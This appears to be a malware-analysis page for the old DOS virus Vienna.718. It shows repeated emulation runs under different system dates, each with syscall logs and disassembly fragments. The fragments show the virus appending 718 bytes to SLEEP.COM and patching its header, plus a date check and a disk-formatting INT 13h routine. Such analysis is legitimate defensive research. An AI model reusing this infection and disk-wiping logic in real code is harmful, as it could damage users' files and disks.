Sample viewer

vx.netlux.org/Virus.DOS.Vienna.718

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:52:26.892927859Z 48 PC: 12a6c | Get DOS version
2018-12-17T22:52:26.895072267Z 47 PC: 12a79 | Get disk transfer address
2018-12-17T22:52:26.896369234Z 26 PC: 12a8c | Set disk transfer address
2018-12-17T22:52:26.897609333Z 42 PC: 12a9c | Get date 0x12a9c: cmp cx, 0x7c8
0x12aa0: jge 0x12aa5
0x12aa2: jmp 0x12add
0x12aa4: nop
0x12aa5: mov ah, 0x2a
0x12aa7: int 0x21
0x12aa9: cmp dh, 0xa
0x12aac: jge 0x12ab1
0x12aae: jmp 0x12add
0x12ab0: nop
0x12ab1: mov ah, 0x2a
0x12ab3: int 0x21
0x12ab5: cmp dl, 0x1f
0x12ab8: jge 0x12abd
0x12aba: jmp 0x12add
0x12abc: nop
0x12abd: mov al, byte ptr [0x35b]
0x12ac0: call 0x12ad0
0x12ac3: cmp byte ptr [0x35b], 0x19
0x12ac8: je 0x12add
2018-12-17T22:52:26.900587488Z 42 PC: 12aa9 | Get date 0x12aa9: cmp dh, 0xa
0x12aac: jge 0x12ab1
0x12aae: jmp 0x12add
0x12ab0: nop
0x12ab1: mov ah, 0x2a
0x12ab3: int 0x21
0x12ab5: cmp dl, 0x1f
0x12ab8: jge 0x12abd
0x12aba: jmp 0x12add
0x12abc: nop
0x12abd: mov al, byte ptr [0x35b]
0x12ac0: call 0x12ad0
0x12ac3: cmp byte ptr [0x35b], 0x19
0x12ac8: je 0x12add
0x12aca: inc byte ptr [0x35b]
0x12ace: loop 0x12abd
0x12ad0: mov ah, 5
0x12ad2: mov ch, 0
0x12ad4: mov dh, 0
0x12ad6: mov dl, byte ptr [0x35b]
2018-12-17T22:52:26.903794752Z 42 PC: 12ab5 | Get date 0x12ab5: cmp dl, 0x1f
0x12ab8: jge 0x12abd
0x12aba: jmp 0x12add
0x12abc: nop
0x12abd: mov al, byte ptr [0x35b]
0x12ac0: call 0x12ad0
0x12ac3: cmp byte ptr [0x35b], 0x19
0x12ac8: je 0x12add
0x12aca: inc byte ptr [0x35b]
0x12ace: loop 0x12abd
0x12ad0: mov ah, 5
0x12ad2: mov ch, 0
0x12ad4: mov dh, 0
0x12ad6: mov dl, byte ptr [0x35b]
0x12ada: int 0x13
0x12adc: ret
0x12add: pop si
0x12ade: push si
0x12adf: add si, 0x2d
0x12ae2: nop
2018-12-17T22:52:26.906141621Z 78 PC: 12b60 | Find first file
2018-12-17T22:52:26.913046592Z 67 PC: 12b9e | Get or set file attributes
2018-12-17T22:52:26.919947936Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:52:27.092090977Z 61 PC: 12bbb | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:52:27.100293014Z 87 PC: 12bc7 | Get or set file date and time
2018-12-17T22:52:27.103418114Z 44 PC: 12bd3 | Get time 0x12bd3: and dh, 7
0x12bd6: jmp 0x12bd9
0x12bd8: nop
0x12bd9: mov ah, 0x3f
0x12bdb: mov cx, 3
0x12bde: mov dx, 0x1d
0x12be1: nop
0x12be2: add dx, si
0x12be4: int 0x21
0x12be6: jb 0x12c3d
0x12be8: cmp ax, 3
0x12beb: jne 0x12c3d
0x12bed: mov ax, 0x4202
0x12bf0: mov cx, 0
0x12bf3: mov dx, 0
0x12bf6: int 0x21
0x12bf8: jb 0x12c3d
0x12bfa: mov cx, ax
0x12bfc: sub ax, 3
0x12bff: mov word ptr [si + 0x21], ax
2018-12-17T22:52:27.106154605Z 63 PC: 12be6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:52:27.114109558Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:52:27.11697409Z 64 PC: 12c1c | Write file or device (Write 718 bytes on handle 5)
2018-12-17T22:52:27.126897751Z 66 PC: 12c2e | Move file pointer
2018-12-17T22:52:27.128682143Z 64 PC: 12c3d | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:52:27.13650601Z 87 PC: 12c50 | Get or set file date and time
2018-12-17T22:52:27.1382467Z 62 PC: 12c54 | Close file
2018-12-17T22:52:27.148650884Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:52:27.160387642Z 26 PC: 12c70 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1992,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10881,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:26.330593365Z 48 PC: 12a6c | Get DOS version
2018-12-25T12:29:26.332511739Z 47 PC: 12a79 | Get disk transfer address
2018-12-25T12:29:26.333703593Z 26 PC: 12a8c | Set disk transfer address
2018-12-25T12:29:26.33482634Z 42 PC: 12a9c | Get date 0x12a9c: cmp cx, 0x7c8
0x12aa0: jge 0x12aa5
0x12aa2: jmp 0x12add
0x12aa4: nop
0x12aa5: mov ah, 0x2a
0x12aa7: int 0x21
0x12aa9: cmp dh, 0xa
0x12aac: jge 0x12ab1
0x12aae: jmp 0x12add
0x12ab0: nop
0x12ab1: mov ah, 0x2a
0x12ab3: int 0x21
0x12ab5: cmp dl, 0x1f
0x12ab8: jge 0x12abd
0x12aba: jmp 0x12add
0x12abc: nop
0x12abd: mov al, byte ptr [0x35b]
0x12ac0: call 0x12ad0
0x12ac3: cmp byte ptr [0x35b], 0x19
0x12ac8: je 0x12add
2018-12-25T12:29:26.337197173Z 42 PC: 12aa9 | Get date 0x12aa9: cmp dh, 0xa
0x12aac: jge 0x12ab1
0x12aae: jmp 0x12add
0x12ab0: nop
0x12ab1: mov ah, 0x2a
0x12ab3: int 0x21
0x12ab5: cmp dl, 0x1f
0x12ab8: jge 0x12abd
0x12aba: jmp 0x12add
0x12abc: nop
0x12abd: mov al, byte ptr [0x35b]
0x12ac0: call 0x12ad0
0x12ac3: cmp byte ptr [0x35b], 0x19
0x12ac8: je 0x12add
0x12aca: inc byte ptr [0x35b]
0x12ace: loop 0x12abd
0x12ad0: mov ah, 5
0x12ad2: mov ch, 0
0x12ad4: mov dh, 0
0x12ad6: mov dl, byte ptr [0x35b]
2018-12-25T12:29:26.34013836Z 78 PC: 12b60 | Find first file
2018-12-25T12:29:26.346845592Z 67 PC: 12b9e | Get or set file attributes
2018-12-25T12:29:26.356071803Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T12:29:26.386011419Z 61 PC: 12bbb | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:26.392620563Z 87 PC: 12bc7 | Get or set file date and time
2018-12-25T12:29:26.39414059Z 44 PC: 12bd3 | Get time 0x12bd3: and dh, 7
0x12bd6: jmp 0x12bd9
0x12bd8: nop
0x12bd9: mov ah, 0x3f
0x12bdb: mov cx, 3
0x12bde: mov dx, 0x1d
0x12be1: nop
0x12be2: add dx, si
0x12be4: int 0x21
0x12be6: jb 0x12c3d
0x12be8: cmp ax, 3
0x12beb: jne 0x12c3d
0x12bed: mov ax, 0x4202
0x12bf0: mov cx, 0
0x12bf3: mov dx, 0
0x12bf6: int 0x21
0x12bf8: jb 0x12c3d
0x12bfa: mov cx, ax
0x12bfc: sub ax, 3
0x12bff: mov word ptr [si + 0x21], ax
2018-12-25T12:29:26.401114562Z 63 PC: 12be6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:26.407752902Z 66 PC: 12bf8 | Move file pointer
2018-12-25T12:29:26.409435422Z 64 PC: 12c1c | Write file or device (Write 718 bytes on handle 5)
2018-12-25T12:29:26.41923839Z 66 PC: 12c2e | Move file pointer
2018-12-25T12:29:26.420891241Z 64 PC: 12c3d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:26.427567994Z 87 PC: 12c50 | Get or set file date and time
2018-12-25T12:29:26.429956551Z 62 PC: 12c54 | Close file
2018-12-25T12:29:26.438353678Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T12:29:26.448240611Z 26 PC: 12c70 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10881,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:07:17.337440493Z 48 PC: 12a6c | Get DOS version
2018-12-25T13:07:17.340242897Z 47 PC: 12a79 | Get disk transfer address
2018-12-25T13:07:17.341929596Z 26 PC: 12a8c | Set disk transfer address
2018-12-25T13:07:17.343554406Z 42 PC: 12a9c | Get date 0x12a9c: cmp cx, 0x7c8
0x12aa0: jge 0x12aa5
0x12aa2: jmp 0x12add
0x12aa4: nop
0x12aa5: mov ah, 0x2a
0x12aa7: int 0x21
0x12aa9: cmp dh, 0xa
0x12aac: jge 0x12ab1
0x12aae: jmp 0x12add
0x12ab0: nop
0x12ab1: mov ah, 0x2a
0x12ab3: int 0x21
0x12ab5: cmp dl, 0x1f
0x12ab8: jge 0x12abd
0x12aba: jmp 0x12add
0x12abc: nop
0x12abd: mov al, byte ptr [0x35b]
0x12ac0: call 0x12ad0
0x12ac3: cmp byte ptr [0x35b], 0x19
0x12ac8: je 0x12add
2018-12-25T13:07:17.347499465Z 78 PC: 12b60 | Find first file
2018-12-25T13:07:17.354378499Z 67 PC: 12b9e | Get or set file attributes
2018-12-25T13:07:17.361164015Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T13:07:17.379970647Z 61 PC: 12bbb | Open file (Filename = 'SLEEP.COM')
2018-12-25T13:07:17.387170772Z 87 PC: 12bc7 | Get or set file date and time
2018-12-25T13:07:17.388666761Z 44 PC: 12bd3 | Get time 0x12bd3: and dh, 7
0x12bd6: jmp 0x12bd9
0x12bd8: nop
0x12bd9: mov ah, 0x3f
0x12bdb: mov cx, 3
0x12bde: mov dx, 0x1d
0x12be1: nop
0x12be2: add dx, si
0x12be4: int 0x21
0x12be6: jb 0x12c3d
0x12be8: cmp ax, 3
0x12beb: jne 0x12c3d
0x12bed: mov ax, 0x4202
0x12bf0: mov cx, 0
0x12bf3: mov dx, 0
0x12bf6: int 0x21
0x12bf8: jb 0x12c3d
0x12bfa: mov cx, ax
0x12bfc: sub ax, 3
0x12bff: mov word ptr [si + 0x21], ax
2018-12-25T13:07:17.390951904Z 63 PC: 12be6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T13:07:17.398902482Z 66 PC: 12bf8 | Move file pointer
2018-12-25T13:07:17.401175605Z 64 PC: 12c1c | Write file or device (Write 718 bytes on handle 5)
2018-12-25T13:07:17.411611168Z 66 PC: 12c2e | Move file pointer
2018-12-25T13:07:17.415213286Z 64 PC: 12c3d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T13:07:17.422796424Z 87 PC: 12c50 | Get or set file date and time
2018-12-25T13:07:17.424315106Z 62 PC: 12c54 | Close file
2018-12-25T13:07:17.442658756Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T13:07:17.454830686Z 26 PC: 12c70 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10881,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:26.382030837Z 48 PC: 12a6c | Get DOS version
2018-12-25T12:29:26.383712111Z 47 PC: 12a79 | Get disk transfer address
2018-12-25T12:29:26.386216375Z 26 PC: 12a8c | Set disk transfer address
2018-12-25T12:29:26.388316495Z 42 PC: 12a9c | Get date 0x12a9c: cmp cx, 0x7c8
0x12aa0: jge 0x12aa5
0x12aa2: jmp 0x12add
0x12aa4: nop
0x12aa5: mov ah, 0x2a
0x12aa7: int 0x21
0x12aa9: cmp dh, 0xa
0x12aac: jge 0x12ab1
0x12aae: jmp 0x12add
0x12ab0: nop
0x12ab1: mov ah, 0x2a
0x12ab3: int 0x21
0x12ab5: cmp dl, 0x1f
0x12ab8: jge 0x12abd
0x12aba: jmp 0x12add
0x12abc: nop
0x12abd: mov al, byte ptr [0x35b]
0x12ac0: call 0x12ad0
0x12ac3: cmp byte ptr [0x35b], 0x19
0x12ac8: je 0x12add
2018-12-25T12:29:26.391245685Z 78 PC: 12b60 | Find first file
2018-12-25T12:29:26.399345582Z 67 PC: 12b9e | Get or set file attributes
2018-12-25T12:29:26.405793469Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T12:29:26.426358297Z 61 PC: 12bbb | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:26.435775987Z 87 PC: 12bc7 | Get or set file date and time
2018-12-25T12:29:26.437800104Z 44 PC: 12bd3 | Get time 0x12bd3: and dh, 7
0x12bd6: jmp 0x12bd9
0x12bd8: nop
0x12bd9: mov ah, 0x3f
0x12bdb: mov cx, 3
0x12bde: mov dx, 0x1d
0x12be1: nop
0x12be2: add dx, si
0x12be4: int 0x21
0x12be6: jb 0x12c3d
0x12be8: cmp ax, 3
0x12beb: jne 0x12c3d
0x12bed: mov ax, 0x4202
0x12bf0: mov cx, 0
0x12bf3: mov dx, 0
0x12bf6: int 0x21
0x12bf8: jb 0x12c3d
0x12bfa: mov cx, ax
0x12bfc: sub ax, 3
0x12bff: mov word ptr [si + 0x21], ax
2018-12-25T12:29:26.440563927Z 63 PC: 12be6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:26.451297208Z 66 PC: 12bf8 | Move file pointer
2018-12-25T12:29:26.455656153Z 64 PC: 12c1c | Write file or device (Write 718 bytes on handle 5)
2018-12-25T12:29:26.465758556Z 66 PC: 12c2e | Move file pointer
2018-12-25T12:29:26.467918223Z 64 PC: 12c3d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:26.47463399Z 87 PC: 12c50 | Get or set file date and time
2018-12-25T12:29:26.475993517Z 62 PC: 12c54 | Close file
2018-12-25T12:29:26.483267269Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T12:29:26.494361277Z 26 PC: 12c70 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10881,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:26.772499758Z 48 PC: 12a6c | Get DOS version
2018-12-25T12:29:26.774266989Z 47 PC: 12a79 | Get disk transfer address
2018-12-25T12:29:26.776093342Z 26 PC: 12a8c | Set disk transfer address
2018-12-25T12:29:26.77743646Z 42 PC: 12a9c | Get date 0x12a9c: cmp cx, 0x7c8
0x12aa0: jge 0x12aa5
0x12aa2: jmp 0x12add
0x12aa4: nop
0x12aa5: mov ah, 0x2a
0x12aa7: int 0x21
0x12aa9: cmp dh, 0xa
0x12aac: jge 0x12ab1
0x12aae: jmp 0x12add
0x12ab0: nop
0x12ab1: mov ah, 0x2a
0x12ab3: int 0x21
0x12ab5: cmp dl, 0x1f
0x12ab8: jge 0x12abd
0x12aba: jmp 0x12add
0x12abc: nop
0x12abd: mov al, byte ptr [0x35b]
0x12ac0: call 0x12ad0
0x12ac3: cmp byte ptr [0x35b], 0x19
0x12ac8: je 0x12add
2018-12-25T12:29:26.780479513Z 78 PC: 12b60 | Find first file
2018-12-25T12:29:26.787184351Z 67 PC: 12b9e | Get or set file attributes
2018-12-25T12:29:26.793356552Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T12:29:26.81065706Z 61 PC: 12bbb | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:26.818308733Z 87 PC: 12bc7 | Get or set file date and time
2018-12-25T12:29:26.819396905Z 44 PC: 12bd3 | Get time 0x12bd3: and dh, 7
0x12bd6: jmp 0x12bd9
0x12bd8: nop
0x12bd9: mov ah, 0x3f
0x12bdb: mov cx, 3
0x12bde: mov dx, 0x1d
0x12be1: nop
0x12be2: add dx, si
0x12be4: int 0x21
0x12be6: jb 0x12c3d
0x12be8: cmp ax, 3
0x12beb: jne 0x12c3d
0x12bed: mov ax, 0x4202
0x12bf0: mov cx, 0
0x12bf3: mov dx, 0
0x12bf6: int 0x21
0x12bf8: jb 0x12c3d
0x12bfa: mov cx, ax
0x12bfc: sub ax, 3
0x12bff: mov word ptr [si + 0x21], ax
2018-12-25T12:29:26.821671114Z 63 PC: 12be6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:26.829167683Z 66 PC: 12bf8 | Move file pointer
2018-12-25T12:29:26.830314805Z 64 PC: 12c1c | Write file or device (Write 718 bytes on handle 5)
2018-12-25T12:29:26.835889249Z 66 PC: 12c2e | Move file pointer
2018-12-25T12:29:26.838077272Z 64 PC: 12c3d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:26.845323759Z 87 PC: 12c50 | Get or set file date and time
2018-12-25T12:29:26.847767789Z 62 PC: 12c54 | Close file
2018-12-25T12:29:26.856766519Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T12:29:26.867506735Z 26 PC: 12c70 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10881,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:26.878731389Z 48 PC: 12a6c | Get DOS version
2018-12-25T12:29:26.885319154Z 47 PC: 12a79 | Get disk transfer address
2018-12-25T12:29:26.886376301Z 26 PC: 12a8c | Set disk transfer address
2018-12-25T12:29:26.887362887Z 42 PC: 12a9c | Get date 0x12a9c: cmp cx, 0x7c8
0x12aa0: jge 0x12aa5
0x12aa2: jmp 0x12add
0x12aa4: nop
0x12aa5: mov ah, 0x2a
0x12aa7: int 0x21
0x12aa9: cmp dh, 0xa
0x12aac: jge 0x12ab1
0x12aae: jmp 0x12add
0x12ab0: nop
0x12ab1: mov ah, 0x2a
0x12ab3: int 0x21
0x12ab5: cmp dl, 0x1f
0x12ab8: jge 0x12abd
0x12aba: jmp 0x12add
0x12abc: nop
0x12abd: mov al, byte ptr [0x35b]
0x12ac0: call 0x12ad0
0x12ac3: cmp byte ptr [0x35b], 0x19
0x12ac8: je 0x12add
2018-12-25T12:29:26.889724919Z 78 PC: 12b60 | Find first file
2018-12-25T12:29:26.896741504Z 67 PC: 12b9e | Get or set file attributes
2018-12-25T12:29:26.902488376Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T12:29:26.960150447Z 61 PC: 12bbb | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:26.967211675Z 87 PC: 12bc7 | Get or set file date and time
2018-12-25T12:29:26.968811532Z 44 PC: 12bd3 | Get time 0x12bd3: and dh, 7
0x12bd6: jmp 0x12bd9
0x12bd8: nop
0x12bd9: mov ah, 0x3f
0x12bdb: mov cx, 3
0x12bde: mov dx, 0x1d
0x12be1: nop
0x12be2: add dx, si
0x12be4: int 0x21
0x12be6: jb 0x12c3d
0x12be8: cmp ax, 3
0x12beb: jne 0x12c3d
0x12bed: mov ax, 0x4202
0x12bf0: mov cx, 0
0x12bf3: mov dx, 0
0x12bf6: int 0x21
0x12bf8: jb 0x12c3d
0x12bfa: mov cx, ax
0x12bfc: sub ax, 3
0x12bff: mov word ptr [si + 0x21], ax
2018-12-25T12:29:26.971125527Z 63 PC: 12be6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:26.989115275Z 66 PC: 12bf8 | Move file pointer
2018-12-25T12:29:26.990785472Z 64 PC: 12c1c | Write file or device (Write 718 bytes on handle 5)
2018-12-25T12:29:27.00579122Z 66 PC: 12c2e | Move file pointer
2018-12-25T12:29:27.008114184Z 64 PC: 12c3d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:27.028301279Z 87 PC: 12c50 | Get or set file date and time
2018-12-25T12:29:27.030023859Z 62 PC: 12c54 | Close file
2018-12-25T12:29:27.038600834Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T12:29:27.04920187Z 26 PC: 12c70 | Set disk transfer address

{"DateBased":true,"Day":31,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10881,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:27.148701598Z 48 PC: 12a6c | Get DOS version
2018-12-25T12:29:27.150630966Z 47 PC: 12a79 | Get disk transfer address
2018-12-25T12:29:27.152025455Z 26 PC: 12a8c | Set disk transfer address
2018-12-25T12:29:27.153410059Z 42 PC: 12a9c | Get date 0x12a9c: cmp cx, 0x7c8
0x12aa0: jge 0x12aa5
0x12aa2: jmp 0x12add
0x12aa4: nop
0x12aa5: mov ah, 0x2a
0x12aa7: int 0x21
0x12aa9: cmp dh, 0xa
0x12aac: jge 0x12ab1
0x12aae: jmp 0x12add
0x12ab0: nop
0x12ab1: mov ah, 0x2a
0x12ab3: int 0x21
0x12ab5: cmp dl, 0x1f
0x12ab8: jge 0x12abd
0x12aba: jmp 0x12add
0x12abc: nop
0x12abd: mov al, byte ptr [0x35b]
0x12ac0: call 0x12ad0
0x12ac3: cmp byte ptr [0x35b], 0x19
0x12ac8: je 0x12add
2018-12-25T12:29:27.15681774Z 78 PC: 12b60 | Find first file
2018-12-25T12:29:27.166968032Z 67 PC: 12b9e | Get or set file attributes
2018-12-25T12:29:27.173388828Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T12:29:27.189960566Z 61 PC: 12bbb | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:27.196769054Z 87 PC: 12bc7 | Get or set file date and time
2018-12-25T12:29:27.198488684Z 44 PC: 12bd3 | Get time 0x12bd3: and dh, 7
0x12bd6: jmp 0x12bd9
0x12bd8: nop
0x12bd9: mov ah, 0x3f
0x12bdb: mov cx, 3
0x12bde: mov dx, 0x1d
0x12be1: nop
0x12be2: add dx, si
0x12be4: int 0x21
0x12be6: jb 0x12c3d
0x12be8: cmp ax, 3
0x12beb: jne 0x12c3d
0x12bed: mov ax, 0x4202
0x12bf0: mov cx, 0
0x12bf3: mov dx, 0
0x12bf6: int 0x21
0x12bf8: jb 0x12c3d
0x12bfa: mov cx, ax
0x12bfc: sub ax, 3
0x12bff: mov word ptr [si + 0x21], ax
2018-12-25T12:29:27.201712264Z 63 PC: 12be6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:27.208038363Z 66 PC: 12bf8 | Move file pointer
2018-12-25T12:29:27.209383632Z 64 PC: 12c1c | Write file or device (Write 718 bytes on handle 5)
2018-12-25T12:29:27.218317686Z 66 PC: 12c2e | Move file pointer
2018-12-25T12:29:27.219723913Z 64 PC: 12c3d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:27.225998389Z 87 PC: 12c50 | Get or set file date and time
2018-12-25T12:29:27.228299354Z 62 PC: 12c54 | Close file
2018-12-25T12:29:27.23593147Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T12:29:27.245995927Z 26 PC: 12c70 | Set disk transfer address